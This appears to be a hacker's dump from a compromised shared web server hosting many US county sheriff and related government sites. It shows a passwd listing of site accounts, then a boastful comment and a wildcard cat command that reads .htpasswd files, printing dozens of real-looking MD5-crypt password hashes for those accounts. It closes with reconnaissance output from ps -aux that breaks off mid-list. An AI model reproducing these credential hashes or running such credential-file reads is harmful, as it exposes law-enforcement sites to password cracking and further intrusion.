- bjm2:x:10032:2522::/var/www/vhosts/mostwantedgovernmentwebsites.com:/bin/false
- test:x:10033:10033::/home/test:/bin/bash
- bcsd_sync:x:10034:10034::/var/www/vhosts/baxtercountysheriff.com/home:/bin/bash
- ccsal_synce:x:10035:10035::/home/ccsal_synce:/bin/bash
- ccsal_sync:x:10036:10036::/var/www/vhosts/cherokeecountyalsheriff.com/home:/bin/
- bash
- kluser:x:10037:10037:Kaspersky AntiVirus scanner user:/var/db/kav:/sbin/nologin
- tigeraccessftp:x:10038:10038::/var/www/vhosts/crosscountysheriff.org/home:/bin/
- bash
- vbcsd:x:10039:2522::/var/www/vhosts/vbcso.com:/bin/false
- jonms2:x:10040:2522::/var/www/vhosts/jonesso.com:/bin/false
- ccsoks:x:10041:2522::/var/www/vhosts/cherokeecountykssheriff.com:/bin/false
- crcg:x:10042:2522::/var/www/vhosts/crosscountyar.org:/bin/false
- tcsoms:x:10043:2522::/var/www/vhosts/tatecountysheriff.com:/bin/false
- hcsoks:x:10018:2522::/var/www/vhosts/hodgemansheriff.us:/bin/false
- jcsoks:x:10044:2522::/var/www/vhosts/jeffersoncountykssheriff.com:/bin/false
- mosa:x:10045:2522::/var/www/vhosts/mosheriffs.com:/bin/false
- pcsoks:x:10046:2522::/var/www/vhosts/prattcountysheriff.com:/bin/false
- johms_sync:x:10047:10047::/var/www/vhosts/jocomosheriff.org/home:/bin/bash
- hcsar:x:10022:2522::/var/www/vhosts/howardcountysheriffar.com:/bin/false
- hscar:x:10048:2522::/var/www/vhosts/hotspringcountysheriff.com:/bin/false
- pcsoia:x:10049:2522::/var/www/vhosts/plymouthcountysheriff.com:/bin/false
- mcsd:x:10050:2522::/var/www/vhosts/marioncountysheriffar.com:/bin/false
- wsoks:x:10051:2522::/var/www/vhosts/woodsonsheriff.com:/bin/false
- mosa2010:x:10052:10052::/var/www/vhosts/mosheriffs.com/httpdocs/academy/
- file_manager:/bin/bash
- faoret:x:10053:2522::/var/www/vhosts/faoret.com:/bin/false
- bcso_tiger:x:10054:2522::/var/www/vhosts/boonesheriff.com/home:/bin/false
- stcsd:x:10055:2522::/var/www/vhosts/stonecountysheriff.com:/bin/false
- ccsoms:x:10056:2522::/var/www/vhosts/coahomacountysheriff.com:/bin/false
- kcsoms:x:10057:2522::/var/www/vhosts/kempercountysheriff.com:/bin/false
- pcsoks_sync:x:10058:10058::/var/www/vhosts/prattcountysheriff.com/home:/bin/
- false
- mocsd:x:10059:2522::/var/www/vhosts/monroecountysheriffar.com:/bin/false
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- bcsoga:x:10060:2522::/var/www/vhosts/bakercountysheriffoffice.org:/bin/false
- jonms_sync:x:10061:10061::/var/www/vhosts/jonesso.com/home:/bin/bash
- jcsoks_sync:x:10062:10062::/var/www/vhosts/jeffersoncountykssheriff.com/home:/
- bin/bash
- cpsola:x:10063:2522::/var/www/vhosts/cameronso.org:/bin/false
- cgsomo:x:10064:2522::/var/www/vhosts/capecountysheriff.org:/bin/false
- sfsoar:x:10065:2522::/var/www/vhosts/stfranciscountysheriff.org:/bin/false
- sfsoar_sync:x:10066:10066::/var/www/vhosts/stfranciscountysheriff.org/home:/bin/
- bash
- code:x:10067:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/code:/bin/
- false
- fcsoga:x:10068:2522::/var/www/vhosts/floydcountysheriff.org:/bin/false
- mcsoga:x:10069:2522::/var/www/vhosts/meriwethercountysheriff.org:/bin/false
- code2:x:10070:2522::/var/www/vhosts/admin.mostwantedwebsites.net:/bin/false
- kcsoil:x:10071:2522::/var/www/vhosts/knoxcountysheriffil.com:/bin/false
- mcsoal:x:10072:2522::/var/www/vhosts/marionsoal.com:/bin/false
- sgsomo:x:10073:2522::/var/www/vhosts/sgcso.com:/bin/false
- gcsoms:x:10074:2522::/var/www/vhosts/georgecountymssheriff.com:/bin/false
- stoms:x:10075:2522::/var/www/vhosts/stonecountymosheriff.com:/bin/false
- hcsar_sync:x:10076:10076::/var/www/vhosts/howardcountysheriffar.com/home/:/bin/
- bash
- alsa:x:10077:2522::/var/www/vhosts/alabamasheriffs.com:/bin/false
- pcsoar:x:10078:2522::/var/www/vhosts/perrycountysheriffar.org:/bin/false
- rcsd:x:10079:2522::/var/www/vhosts/randolphcountysheriff.org:/bin/false
- tisoms:x:10081:2522::/var/www/vhosts/tishomingocountysheriff.com:/bin/false
- stoms_sync:x:10082:10082::/var/www/vhosts/stonecountymosheriff.com/home:/usr/
- libexec/openssh/sftp-server
- prsoar:x:10083:2522::/var/www/vhosts/prairiecountysheriff.org:/bin/false
- mcsd_sync:x:10084:10084::/var/www/vhosts/marioncountysheriffar.com/home/xmlapp:/
- bin/bash
- jccgms:x:10086:2522::/var/www/vhosts/jeffersoncountyms.gov:/bin/false
- ccsook:x:10087:2522::/var/www/vhosts/sheriffcomanche.com:/bin/false
- fcsoar:x:10088:2522::/var/www/vhosts/fultoncountyso.org:/bin/false
- poalac:x:10085:2522::/var/www/vhosts/poalac.org:/bin/false
- arsa:x:10091:2522::/var/www/vhosts/arkansassheriffsassociation.com:/bin/false
- rcpica:x:10080:2522::/var/www/vhosts/rcpi-ca.org:/bin/false
- ciga:x:10092:2522::/var/www/vhosts/cityofgassville.org:/bin/false
- sfcgar:x:10093:2522::/var/www/vhosts/stfranciscountyar.org:/bin/false
- lcsomo:x:10094:2522::/var/www/vhosts/lcsdmo.com:/bin/false
- tcsoal:x:10095:2522::/var/www/vhosts/talladegasheriff.org:/bin/false
- jwiegand:x:10096:10096::/home/jwiegand:/bin/bash
- bcsf:x:10097:2522::/var/www/vhosts/baxtercountysherifffoundation.org:/bin/false
- prsoms:x:10089:2522::/var/www/vhosts/prentisscountymssheriff.com:/bin/false
- acsoms:x:10098:2522::/var/www/vhosts/adamscosheriff.org:/bin/false
- kssa:x:10099:2522::/var/www/vhosts/kansassheriffs.org:/bin/false
- // CAT'N HUNDREDS OF .HTPASSWD FILES IN ONE COMMAND LIKE A BOSS
- $ cat /var/www/vhosts/*/pd/*
- 2010user:$1$YfJPNAST$w9rRAaYhAMjpkw.GRLUD90
- jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0
- jdpa:$1$uBEldfcW$mzSY61wj97PN41JWNPcA9/
- jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0
- acsoms:$1$/OuADgxB$l7pPU2kXeKlw7Iz9NLGID.
- acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1
- acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1
- code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60
- code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60
- alsa:$1$gg9rFhvF$S41htlhsl3AJYZu4dKWR50
- alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.
- alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.
- arsa:$1$uKT57hqw$3KrrKngKKD.J8nFMYq0nf/
- arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1
- arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.
- arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1
- arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.
- bcsoga:$1$wD0B3RJw$F/kRNzUrqyAsXGEZUUt7t.
- bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..
- bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..
- barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.
- barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91
- barms:$1$2bdOu.yt$HfX7Ziq4mwgqQxFCBlnNq0
- barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.
- barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91
- bcsd:$1$.wyutJHS$fI7mFoV8F0txtXS3yCYxr.
- bcsd:$1$8HNY0AzH$FLIStjcXdzSLFnVcWOs7/1
- bcsf:$1$/xEB/mNM$5JyBevwhGqzByNokDINVe/
- bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/
- bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/
- bocg:$1$d04I8Pzb$W0qBTons8Dmm2Jw9We3xB/
- bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0
- bocg:$1$GvD5EuF.$RZ/I71SmN2YCppnS3KtbT0
- bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0
- bocs:$1$oZB0olYk$/qQ.rLe8/yBnA5lT4HDga1
- bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0
- bocs:$1$qsQEjN0k$8UNgs23OwLrA73XUXxSCa.
- bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0
- cpsola:$1$A0/je.pN$ZGoDb3fmCJdQ1qUB6aRhk1
- cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90
- cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90
- cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1
- cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.
- cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1
- cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.
- ccsal:$1$nqrzKwH1$1SUCJG3Ge1jLbd6a4pd.61
- ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0
- ccsal:$1$IexvBxv4$d.exkq9idTn05wW6smXSF1
- ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0
- ccsoks:$1$KKczisBp$d1rBOCK8iRkjmBZhv.YXp.
- ccsoks:$1$BbttpHqg$TzMxb1f40QefP8kSIEpJn/
- ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71
- ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0
- ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71
- ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0
- ciwy:$1$/DFbGKuZ$NNH1VE8TXfaBhuJHDca2x1
- ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.
- ciwy:$1$9olIl6Nc$ycMPhxfVWGJ5Ka5ZLlEtK0
- ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.
- ccsd:$1$IT4RKfjK$um0Ty6wMJ8O7kIIbIJqRD1
- ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.
- ccsd:$1$SORBbPS1$MPxim.kDNpNeuwwAE2Ugb0
- ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.
- ccsoms:$1$PGQZTZay$8g.aw5516ifzB9pfGUdZX.
- ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1
- ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1
- crcg:$1$ygtelVAp$E9V85e3doWLLyyCMCv2KB1
- crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.
- crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.
- crcsd:$1$r7WoQcbv$fR4knFo1YqBYUb91ES7/K.
- crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.
- crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.
- dcsd:$1$/3GteTce$sYf4e6A7O0ais2J1EyTMz.
- dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1
- dcsd:$1$BBBW.zd2$G4ZJegTfHreCJXwojwA8P0
- dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1
- fcsoga:$1$oC0dNlM6$GfFCuZ2N2UnKMI9MZWbwb1
- fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0
- fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0
- fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0
- fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0
- gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/
- gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0
- gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/
- gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0
- grcg:$1$Ivu4aPQu$weOoXmrm8jtNOUrFTS3vf.
- grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1
- grcg:$1$HPX7vhZO$LWzATw3fluPOYFYnDd3I61
- grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1
- gcsd:$1$T7O8tM.l$AUYTc4uhY7aYuhVfHNW/9/
- gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/
- gcsd:$1$07x6ii.Y$K33yOQCuMu9juWBU0.tw31
- gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/
- hcsoks:$1$3qklJZQ5$ERPeSxH1DtuX2pis0ah0q0
- hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1
- hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1
- hscar:$1$gJJLpsPa$lQkGfO6sT0TM/p/ACmieM0
- hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/
- hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/
- hcsar:$1$Jy4Wo5AA$dgDDznszPUBYPmuM7eBj9.
- hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1
- hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0
- hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1
- hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0
- izcg:$1$SzRnGt.T$085pTzlcqWgJv7DguG6dv1
- izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/
- izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/
- icsd:$1$XwGJZ7Ia$sj99HKjkzILx6qGDiWmHy.
- icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0
- icsd:$1$vo3ZSlXF$DTLKCc/7z6IFgvbFtvCAT1
- icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0
- izhth:$1$mrQmTDHz$Nr02zDwC5m7NxplWZWW0O/
- izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1
- izhth:$1$IbDSXX4O$sFVTpg5ts1EagLkzoNZQ30
- izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1
- jcsd:$1$ZkEh5MIb$v3l1z3PQZ5yyG5ABzWef2/
- jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0
- jcsd:$1$HgNpXLdQ$KPP62pOHPjl7XslEBTqGH/
- jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0
- jcsoks:$1$Z/D6TvAM$JGvIns6wx.RCPwv0C51TJ/
- jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.
- jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.
- jccgms:$1$aHstkoLz$tOpRH9HwTGLjSF7YZRiuo.
- jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.
- jccgms:$1$xi9Cf0im$4vC24C1vlcoteo1aDEFJW.
- jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.
- johms:$1$fmryjChe$CwJyPptiu0Iwcai2LUTPu0
- johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1
- johms:$1$nykSrZ50$0yH62S8FZq3NOczux2cjC/
- johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1
- jocsd:$1$s63jViKP$gaT9byX/ySNJDMkA5.PCd.
- jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1
- jocsd:$1$u.mk/ipa$.WSRBIK6MvsWHcfTMt//I/
- jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1
- jonms:$1$fLjLWKCb$UDgyy9UzkwyiJC7AWtD40/
- jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0
- jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.
- jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0
- jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.
- kssa:$1$YlbQvrcd$ruaMsfYDwhVlH1k/LGlIJ.
- kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/
- kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/
- kcsoms:$1$goZMALd1$JnxVQ9J603tEsthqkadvE.
- kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1
- kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1
- kcsoil:$1$4XOK98tG$kjOUaIN3ZNZepl3aCHijc.
- kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0
- kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0
- lawmo:$1$MezHiiqn$OoLtNNLAm20gBBvW0BtOB0
- lawmo:$1$h11BRv3g$wA.ITq8U0Cq4N4ZHoDVmC0
- lawmo:$1$5jjY0Omy$eWZkfvCtF0tLdyDv9fmnC0
- lcsomo:$1$I/cdxg/g$Pn2tTJK776Si9phzUfNzT1
- lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.
- lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.
- mcsd:$1$NZpwhOoE$4zeC8H.PhoyVjsBhB4VFb1
- mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0
- mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0
- mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0
- mcsoal:$1$1/1E1eTW$epzJFtOGo/Me/eeo.6Dg//
- mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0
- mcsoal:$1$OPKYzsqo$WmTHzrV/WlbZPH4JWKQ41.
- mcmtn:$1$dJKz4stC$wxWzTBkC76Mox8yv5i8z9/
- mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.
- mcmtn:$1$AGtoxXro$zlQV8/C674RTOhMwp9Pqf1
- mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.
- mcsoga:$1$p2oL7Pi5$LusOSWnvUHofJ0iAvhvEr0
- mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0
- mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0
- mocsd:$1$1bJZUS9v$9cPKxA8hiX1bKbCz6Js1i1
- mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/
- mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/
- mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0
- mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.
- mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0
- mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.
- CityPass:$1$pJ75xXss$N1LTh9EwM.aKAeZBjdp7N/
- PerryCounty:$1$T6K61l6D$05/rRhPd6fDPqVuJUQKfF/
- bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60
- bjm:$1$bXLmD2bt$4Rk5jfA2x8UcJ7W4Tw35s0
- bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60
- bjm:$1$Sx95fGzg$6ASZ4J6kjziYIDH6xQcki1
- 2010user:$1$vFJrv2A6$K82FAw89ZvDc1pvHdLhA21
- bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0
- bjm:$1$Ds5nOfeW$snloc4PMymDdgG5ld6wjw/
- bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0
- ncsd:$1$3Ocas0HS$Wg2AZygMmPne.rCxh4n9Y0
- ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1
- ncsd:$1$bSp.iYg8$cr1ZzEYuBTVU.vCPhC6sw/
- ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1
- pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0
- pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0
- pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0
- pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0
- pcsoia:$1$e3ASKnqy$ps9LSniLjC3kOkGaGn5YM0
- pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50
- pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50
- poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.
- poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1
- poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.
- poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1
- polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0
- polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.
- polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0
- polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.
- prsoar:$1$2jmIGv7j$0zSfngOL9UeBLq/zsuFGg1
- prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0
- prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0
- pcsoks:$1$84DZ5jUv$22478RXYSJ83Yon/VbXoq0
- pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.
- pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.
- prsoms:$1$Nfacesfq$cwqZNxlFjJo8N/RrOodIY1
- prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.
- prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.
- rcsd:$1$aM0/EhqP$HPTN/wX2L0ErPIsaYADow1
- rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11
- rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11
- rcpica:$1$6FIHrPeK$mspB9nNY4YNy/.9brKRlP.
- rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1
- rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1
- sacsd:$1$ZLGR289Y$KevSJOo0PezTAqatJUouK.
- sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1
- sacsd:$1$dIxeOzw5$SdsN7F6iYxyryZLodaDHC0
- sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1
- scsd:$1$aRIkZHPq$dYZwP7SrhhumFy6QVTNr1/
- scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0
- scsd:$1$L05Gndoq$V8OevuZqUMK//gsBOPmxq1
- scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0
- sgsomo:$1$kFw.79HG$KMcvV/zhzzB2PUzy0860N.
- sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0
- sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0
- shsd:$1$2Qzvqur1$erX5RIvC9bt48DoK9UXgn1
- shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.
- shsd:$1$dWHRMEmO$r0SD3BNmRZFNgcJjd2zJh.
- shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.
- ccsook:$1$vI8JJAm1$XXWEHCO6htvjMb56c/HE9/
- ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1
- ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1
- sfcgar:$1$EqTn7VjG$LWSf095sVWtuTPWQioUVt/
- sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/
- sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/
- sfsoar:$1$dvPtn2zd$GlH7j4etEjFOySAHu4oZV0
- sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.
- sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.
- stoms:$1$2VDTPaiT$o6kUTW6UXLdy6zeqLL2q00
- stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.
- stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.
- stcsd:$1$36mnxETG$J0BtoGvBQUIlajywJ65EU.
- stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1
- stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1
- tcsoal:$1$8IvtSsof$Js4ss4101mHXRhS1UgW.z/
- tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/
- tcsoal:$1$/Ciht4fS$S4Hx3kHnNkm3Vu2Cl/E7.1
- tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/
- tcsoms:$1$aCobysj2$oZShF1So8TZCuH8dq79UE0
- tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61
- tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61
- tisoms:$1$8mQ6hE6A$CvYlVP6fPLmuSHdyDJg4v1
- tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1
- tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1
- tunms:$1$6F5myr2t$KmJLCml.CybyQjDqoG3TG1
- tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1
- tunms:$1$uWPMvVMY$v3Qc7eyUJB7Evpt0iSnOq1
- tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1
- vbcsd:$1$C0j6Be38$To6eb4DzaCtA46pN/x6sG.
- vbcsd:$1$4e/iDO4I$6157lAdEF2IaaYKa2NwNS.
- wcsoks:$1$WO9U6YiB$wEEafCY2i86zRpEi1hce20
- wcsoks:$1$HZoMeTi0$gwdZvPQTqavG4sAiDlEXZ1
- wsoks:$1$eSaYt0Fv$vi9zN.GAwbKGQoslpxDr11
- // LETS SEE WHAT KINDA SHIT THEY RUNNIN
- $ ps -aux
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 2156 532 ? Ss Feb22 3:04 init [3]
- root 2 0.0 0.0 0 0 ? S Feb22 0:35 [migration/0]
- root 3 0.0 0.0 0 0 ? SN Feb22 4:16 [ksoftirqd/0]
- root 4 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/0]
- root 5 0.0 0.0 0 0 ? S Feb22 0:30 [migration/1]
- root 6 0.0 0.0 0 0 ? SN Feb22 5:09 [ksoftirqd/1]
- root 7 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/1]
- root 8 0.0 0.0 0 0 ? S Feb22 0:38 [migration/2]
- root 9 0.0 0.0 0 0 ? SN Feb22 3:03 [ksoftirqd/2]
- root 10 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/2]
- root 11 0.0 0.0 0 0 ? S Feb22 0:53 [migration/3]
- root 12 0.1 0.0 0 0 ? SN Feb22 337:41 [ksoftirqd/3]
- root 13 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/3]
- root 14 0.0 0.0 0 0 ? S< Feb22 0:01 [events/0]
- root 15 0.0 0.0 0 0 ? S< Feb22 0:00 [events/1]
- root 16 0.0 0.0 0 0 ? S< Feb22 0:01 [events/2]
- root 17 0.0 0.0 0 0 ? S< Feb22 0:13 [events/3]
- root 18 0.0 0.0 0 0 ? S< Feb22 0:00 [khelper]
- root 19 0.0 0.0 0 0 ? S< Feb22 0:00 [kthread]
- root 25 0.0 0.0 0 0 ? S< Feb22 0:01 [kblockd/0]
- root 26 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/1]
- root 27 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/2]
- root 28 0.0 0.0 0 0 ? S< Feb22 0:27 [kblockd/3]
- root 29 0.0 0.0 0 0 ? S< Feb22 0:00 [kacpid]
- root 128 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/0]
- root 129 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/1]
- root 130 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/2]
- root 131 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/3]
- root 134 0.0 0.0 0 0 ? S< Feb22 0:00 [khubd]
- root 136 0.0 0.0 0 0 ? S< Feb22 0:00 [kseriod]
- root 213 0.0 0.0 0 0 ? S< Feb22 71:43 [kswapd0]
- root 214 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/0]
